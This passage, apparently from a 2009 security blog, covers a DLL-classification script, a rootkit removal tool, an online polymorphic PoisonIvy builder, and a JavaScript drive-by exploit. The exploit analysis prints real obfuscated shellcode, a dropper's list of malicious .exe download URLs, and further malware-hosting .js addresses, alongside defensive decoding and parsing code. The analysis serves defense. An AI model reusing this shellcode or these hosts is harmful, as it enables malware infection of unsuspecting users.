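            "user_writable": any(part in low for part in USER_WRITABLE),
        }
        entry["suspicious"] = entry["dynamic"] and not entry["system_dir"]
        entries.append(entry)
    return entries


def suspicious_dlls(static_imports, loaded_modules):
    """Names the user would be offered for removal, in load order."""
    return [e["name"] for e in classify_modules(static_imports, loaded_modules)
            if e["suspicious"]]


if __name__ == "__main__":
    for e in classify_modules(STATIC_IMPORTS, LOADED_MODULES):
        kind = "static " if e["static"] else "dynamic"
        print("%s %-5s %s" % (kind, "SUSP" if e["suspicious"] else "", e["path"]))
```

Note the caveat visible in the output: ntdll.dll is not in the import table (kernel32 pulls it in), so a real tool must resolve imports transitively before calling something dynamic, and a trusted directory is only a weak signal, since a DLL planted there by an attacker with enough privileges is still worth a look at its signature and timestamps.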
More features are being added at the moment. Stay tuned for further updates. Contact us at contact.fingers @ gmail.com, if you have any questions.
- EF
Sunday, February 8, 2009
Prevx Gromozon Rootkit Removal tool
SNAP 1 :
The tool then warns the user that any system security tools, such as an anti-virus, that may interfere with the removal of the Gromozon rootkit should be disabled, as shown in SNAP 2.
SNAP 2 :
The tool is quite fast in performing a preliminary check for the Trojan.Gromozon rootkit component, and it lets the user decide whether to proceed with the removal or to quit, as shown in SNAP 3.
SNAP 3 :
Once the user chooses to continue with the removal process, the next warning window comes up, requesting the user to save all unsaved work before continuing with the system reboot, as seen in SNAP 4.
SNAP 4 :
After the system has been rebooted, the scan begins [SNAP 5].
SNAP 5 :
Once the scanning and cleaning is complete, the scan details along with the logging details are displayed to the user [SNAP 6].
SNAP 6 :
A log is generated, as shown in the above snapshot, in a file named "gromozon_removal.log". Since no event was triggered and no hidden files were found, there was nothing really to show in a snapshot.
If you wish to participate in this project in a dedicated fashion or in any other projects, kindly email us at contact.fingers @ gmail.com
- EF
Creating Online polymorphic malware based PoisonIvy
Today the Internet is also a hostile environment: even when it is used with the minimum necessary security precautions, it serves as a platform for committing various types of attacks and, as in this case, for offering a variety of "services", including the creation of malicious code.
This is the online version of PoisonIvy, called Polymorphic PoisonIvy Builder Online. PoisonIvy is a trojan well known in the malware world that follows the classic scheme of malicious code creation: a trojan (server) is built to spread and infect computers, and those infected computers are then controlled through the client program.
However, this online version has an extra component that makes the result much more dangerous than malware created the conventional way: it adds polymorphic features. This means that each binary built with this automated builder is different, because its code is completely changed.
This feature seeks to evade detection by antivirus signatures and prolong the malware's life cycle, which implies that the longer the AV fails to detect it, the more money its creator generates.
This package is written in PHP/ASM, and while the creation of the malware is done online, it is not free: it is marketed at a price of U$S 500. In the screenshot we can see its features:
This situation is merely one more of the many examples that make it clear that malware is a business, an industry that more and more developers are joining.
# Jorge Mieres
Saturday, February 7, 2009
Busy Weekend
- EF
Friday, February 6, 2009
Exploitation of vulnerabilities through JS
These methods, combined with different strategies, become a time bomb that detonates with the simple action of accessing a page maliciously manipulated to host the attack strategies.
Numerous cases, such as the exploitation of various weaknesses through .js, .swf, .pdf and .mp3 files, even pretending to be .css files, make clear that any type of file can be used as a distribution channel, let alone as an infection vector.
In recent weeks, a wave of .js files has been used to redirect to the download of malicious code through obfuscated scripts hidden in the body of the JavaScript, like the following one, hosted at the URL http://www.710sese .cn/a1/realdadong. js, whose md5 hash is d1094b907dfe99784b206d2ae9b1fe97:
var mybr = unescape("%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%
ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b
%ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe
98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045%u6856%ufcaa
%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%
u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a3
6%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0
544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%
uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b%u8b3c%u1
e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%
u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u04
8b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%
uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u458
9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u
5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%
u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff5
6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uec
b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%
u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830
%u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff0
0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f%u772e%u6965
%u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073");
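A literal of this shape is shellcode: unescape("%uXXXX") produces UTF-16 code units that sit in memory as little-endian byte pairs, so %u7468 becomes the bytes "ht". The Python below is an added example, not code from this post, that reassembles such a literal even when it has been wrapped across lines or split with "+" concatenations (as in the extracted text above), decodes it to bytes, and pulls out the printable strings, which is the quickest way to recover an embedded download URL without running anything. The sample literal is constructed with a placeholder URL and a short filler prefix; it is not a decode of the script above.

```python
import re

# Constructed sample in the same unescape("%u....") style as the script above;
# the trailing units spell a placeholder URL, not a real one.
SAMPLE = (
    'var mybr = unescape("%u9090%u9090%u17eb%u645e%uc033'
    '%u7468%u7074%u2f3a%u642f%u652e%u6178"+"%u706d%u656c%u692e\n'
    '%u766e%u6c61%u6469%u6e2f%u7765%u612f%u2e31%u7363%u0073");'
)

_UNIT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_to_bytes(js_text):
    """Reassemble a wrapped/concatenated unescape() literal and decode it to the
    byte string it occupies in memory.

    JavaScript unescape('%uXXXX') yields one UTF-16 code unit; in a heap spray
    or as executed shellcode its two bytes are laid out little-endian, so
    %u7468 decodes to b'ht'.  Plain %XX escapes decode to a single byte.
    """
    joined = re.sub(r'"\s*\+\s*"', "", js_text)   # drop "+" string concatenations
    joined = re.sub(r"\s+", "", joined)           # drop extraction line breaks
    out = bytearray()
    for m in _UNIT.finditer(joined):
        if m.group(1):
            unit = int(m.group(1), 16)
            out += bytes((unit & 0xFF, unit >> 8))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def printable_strings(blob, min_len=6):
    """Runs of printable ASCII of at least min_len bytes: URLs, API names, messages."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def nop_sled_length(blob):
    """Number of leading 0x90 bytes, a common tell for a sprayed payload."""
    count = 0
    for b in blob:
        if b != 0x90:
            break
        count += 1
    return count


if __name__ == "__main__":
    blob = unescape_to_bytes(SAMPLE)
    print(len(blob), "bytes, nop sled:", nop_sled_length(blob))
    print("strings:", printable_strings(blob))
```

Pointed at the script above, the same three functions give the payload length, whether it starts with a sled, and the cleartext strings the exploit carries; the decoded bytes can then go to a disassembler, never to a browser.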
Furthermore, midway through the entire infection process, which lasts only a few seconds, it connects to the sites txt.hsdee .com and www.wdswe .com: the former performs a Drive-by Update from the file oo.txt, and when it responds with a 200 "OK", the binaries listed in the file are downloaded. The first of them comes from http://www.wdswe .com/new/new1. exe (md5: 1c0b699171f985b1eab092bf83f2ad37).
The information read from the text file is as follows:
[file]
open=y
url1=http://www.wdswe .com/new/new1 .exe
url2=http://www.wdswe .com/new/new2 .exe
url3=http://www.wdswe .com/new/new3 .exe
url4=http://www.wdswe .com/new/new4 .exe
url5=http://www.wdswe .com/new/new5 .exe
url6=http://www.wdswe .com/new/new6 .exe
url7=http://www.wdswe .com/new/new7 .exe
url8=http://www.wdswe .com/new/new8 .exe
url9=http://www.wdswe .com/new/new9 .exe
url10=http://www.wdswe .com/new/new10 .exe
url11=http://www.wdswe .com/new/new11 .exe
url12=http://www.wdswe .com/new/new12 .exe
url13=http://www.wdswe .com/new/new13 .exe
url14=http://www.wdswe .com/new/new14 .exe
url15=http://www.wdswe .com/new/new15 .exe
url16=http://www1.wdswe .com/new/new16 .exe
url17=http://www1.wdswe .com/new/new17 .exe
url18=http://www1.wdswe .com/new/new18 .exe
url19=http://www1.wdswe .com/new/new19 .exe
url20=http://www1.wdswe .com/new/new20 .exe
url21=http://www1.wdswe .com/new/new21 .exe
url22=http://www1.wdswe .com/new/new22 .exe
url23=http://www1.wdswe .com/new/new23 .exe
url24=http://www1.wdswe .com/new/new24 .exe
url25=http://www1.wdswe .com/new/new25 .exe
url26=http://www1.wdswe .com/new/new26 .exe
url27=http://www1.wdswe .com/new/new27 .exe
url28=http://www1.wdswe .com/new/new28 .exe
count=28
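The oo.txt file above is a plain INI-style download list, which makes it easy to turn into blocklist material. The Python below is an added example (not code from this post or from the malware) that parses that layout with the standard library, orders the urlN keys numerically, checks that the declared count matches the number of URLs present, collects the distinct hosts, and defangs them for a report. The sample text is constructed with placeholder hosts and a deliberately wrong count.

```python
import configparser
import re
from urllib.parse import urlsplit

# Constructed sample in the same layout as the oo.txt shown above; the hosts
# are placeholders, and count is deliberately one higher than the URLs present.
SAMPLE = """\
[file]
open=y
url1=http://dl.example.invalid/new/new1.exe
url2=http://dl.example.invalid/new/new2.exe
url3=http://dl2.example.invalid/new/new3.exe
count=4
"""


def parse_update_file(text):
    """Parse the download list and return a dict with:
    open        - whether the open flag is set (y/yes/1)
    urls        - the urlN values in numeric order (url10 after url9)
    count       - the declared count, or None if absent
    consistent  - whether the declared count matches the number of URLs
    hosts       - the distinct download hosts, sorted
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if "file" not in cp:
        raise ValueError("missing [file] section")
    sec = cp["file"]
    numbered = {}
    for key, value in sec.items():
        m = re.fullmatch(r"url(\d+)", key)
        if m:
            numbered[int(m.group(1))] = value.strip()
    urls = [numbered[i] for i in sorted(numbered)]
    count = int(sec["count"]) if "count" in sec else None
    return {
        "open": sec.get("open", "").strip().lower() in ("y", "yes", "1"),
        "urls": urls,
        "count": count,
        "consistent": count == len(urls),
        "hosts": sorted({urlsplit(u).hostname for u in urls}),
    }


def defang(url):
    """Render a URL so it cannot be clicked by accident (scheme and host only)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").replace(".", "[.]")
    return "hxxp://" + host + parts.path


if __name__ == "__main__":
    report = parse_update_file(SAMPLE)
    print("open:", report["open"], "declared:", report["count"],
          "present:", len(report["urls"]), "consistent:", report["consistent"])
    for u in report["urls"]:
        print(" ", defang(u))
    print("hosts:", report["hosts"])
```

The count check matters when the file is captured mid-update or truncated by a proxy: a mismatch tells the analyst that the list they hold is not the list the dropper will act on.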
Some other URLs used to spread malware in the same way are:
http://97.haowyt .com/js/baidu .js
http://www.163wyt .com/js/yahoo .js
http://www.710sese .cn/a1/hohogl .js
http://www.710sese .cn/a1/wokaono .js
http://www.710sese .cn/a1/woriniss .js
http://qq.18i16 .net/lzz .js
http://qq.18i16 .net/bf .js
http://qq.18i16 .net/realplay .js
http://qq.18i16 .net/new .js
http://qq.18i16 .net/cx .js
http://www.baomaaa .cn/a1/realdadong .js
http://www.baomaaa .cn/a1/hohogl .js
http://www.baomaaa .cn/a1/wokaono .js
http://www.baomaaa .cn/a1/woriniss .js
http://tj.gan7788 .com/js/js .js
http://sss.2010wyt .net/r .js
http://sss.2010wyt .net/614 .js
Despite the efforts of malware creators and their advanced infection techniques, there is one element that can prevent becoming a victim of similar attacks, and it comes down purely to keeping everything completely up to date, applications included.
# Jorge Mieres